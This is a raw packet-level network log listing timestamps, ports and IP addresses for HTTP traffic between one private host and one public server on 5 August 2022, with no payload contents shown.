Aug 5, 2022 13:54:13.535396099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535415888 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535504103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535510063 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535515070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535520077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535523891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535528898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535532951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535537004 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535542011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.564940929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.564954996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.564964056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.564970970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.564992905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565012932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565032959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565045118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565063000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565080881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565079927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565102100 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565115929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565121889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565126896 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565143108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565146923 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565162897 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565181017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565197945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565207958 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565217018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565227985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565234900 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565237045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565254927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565268040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565274954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565288067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565294027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565314054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565325975 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565332890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565342903 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565351963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565351963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565372944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565372944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565392017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565396070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565407991 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565412045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565431118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565448999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565455914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565468073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565486908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565502882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565505028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565526009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565527916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565543890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565548897 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565562963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565581083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565599918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565598965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565612078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565618992 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565622091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565639019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565649033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565659046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565677881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565679073 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565696955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565713882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565716028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565733910 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565737963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565752029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565778017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565788984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565795898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565800905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565815926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565835953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565841913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565854073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565855026 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565862894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565872908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565881014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565892935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565898895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565912008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565920115 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565932035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565936089 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565953016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565957069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565968990 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.565973043 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565990925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.565994024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566005945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566009998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566028118 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566030025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566049099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566050053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566061974 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566090107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566108942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566138029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566158056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566220045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566508055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566524982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566545010 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566564083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566581011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566597939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566603899 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566617012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566628933 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566637039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566656113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566654921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566674948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566694021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566694021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566715002 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566724062 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566734076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566751957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566752911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566770077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566781998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566788912 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566807032 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566817999 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566826105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566843987 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566845894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566863060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566869020 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566881895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566895962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566900015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566920042 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566927910 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566937923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566957951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566958904 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566977024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.566986084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.566997051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.567003012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.567037106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.567054987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.597949982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.598077059 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627501011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627516031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627530098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627541065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627554893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627587080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627619028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627640963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627640963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627665043 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627672911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627686024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627691984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627712965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627716064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627741098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627749920 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627765894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627789974 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627795935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627810001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627831936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627857924 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627857924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627886057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627895117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627911091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627933979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627935886 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627958059 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.627959967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627985001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.627994061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628011942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628032923 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628035069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628060102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628070116 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628083944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628094912 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628107071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628129005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628132105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628153086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628154039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628179073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628180027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628202915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628204107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628225088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628227949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628248930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628249884 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628272057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628273010 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628295898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628297091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628319979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628319979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628343105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628353119 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628366947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628366947 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628391027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628391981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628415108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628417015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628438950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628439903 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628462076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628465891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628485918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628488064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628509045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628513098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628539085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628540993 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628568888 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628573895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628592968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628593922 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628616095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628617048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628638983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628639936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628664017 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628664017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628688097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628689051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628711939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628715038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628735065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628737926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628757000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628761053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628781080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628786087 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628803968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628808022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628827095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628833055 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628850937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628858089 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628875017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628881931 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628899097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628905058 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628923893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628936052 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628945112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628968000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.628968000 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.628990889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629013062 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629014015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629040003 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629040003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629061937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629075050 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629085064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629102945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629107952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629131079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629153967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629153967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629173040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629177094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629200935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629213095 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629225969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629247904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629250050 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629271984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629287004 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629293919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629316092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629317045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629339933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629354954 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629364014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629386902 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629391909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629410982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629429102 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629432917 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629457951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629468918 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629481077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629503965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629503965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629528999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629550934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629554033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629576921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.629578114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629611015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.629636049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.658946991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.658991098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.659024954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.659071922 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.659107924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.659147024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.659164906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.659183979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.659203053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.659221888 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.659245014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.659276009 CEST	49778	80	192.168.2.4	51.195.166.178
